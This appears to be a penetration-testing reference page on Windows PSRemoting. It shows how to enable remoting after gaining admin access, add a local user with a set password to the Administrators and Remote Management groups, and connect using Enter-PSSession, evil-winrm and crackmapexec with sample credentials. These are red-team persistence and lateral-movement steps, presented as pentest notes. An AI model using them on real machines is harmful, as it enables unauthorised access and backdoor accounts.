# PSRemoting

## Enabling PSRemoting

After getting administrator access to a machine it is possible to enable PSRemoting:

```
Enable-PSRemoting
```

It might be usefull to add a new user or a user you already have to the local `Administrator` or `Remote Management Group`.

```
net user user Welcome01! /add
net localgroup administrators user /add
net localgroup "Remote Management Users" /add
```

## Accessing the machine

### PowerShell Enter-PSsession

```
Enter-PSSession ws01
```

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FANNgKhgHnPzr5ah829Yp%2Fimage.png?alt=media&#x26;token=695dec88-6637-40d6-b867-f998aea99b74" alt=""></div>

### Evil-WinRM

* <https://github.com/Hackplayers/evil-winrm>

```
evil-winrm -i 10.0.0.128 -u john -p 'Welcome2022!'
```

![](https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2Fauvb3oBugGDdlBVOoEmz%2Fimage.png?alt=media\&token=93a983b5-0b59-4b58-a9c7-8ba18981f5ba)

## Crackmapexec

* <https://github.com/byt3bl33d3r/CrackMapExec>

```
crackmapexec winrm 10.0.0.128 -u john -p 'Welcome2022!'
```

![](https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FrrPr9Fk1D336UPHlCDd0%2Fimage.png?alt=media\&token=0e806306-bf75-4bd2-986b-11f8d8d7857c)

{% hint style="info" %}

#### Observation

During testing I found out that crackmapexec is really slow over winrm if Windows Firewall is enabled on our fully up-to-date Windows 10 machine.
{% endhint %}

## References

{% embed url="<https://github.com/Hackplayers/evil-winrm>" %}

{% embed url="<https://github.com/byt3bl33d3r/CrackMapExec>" %}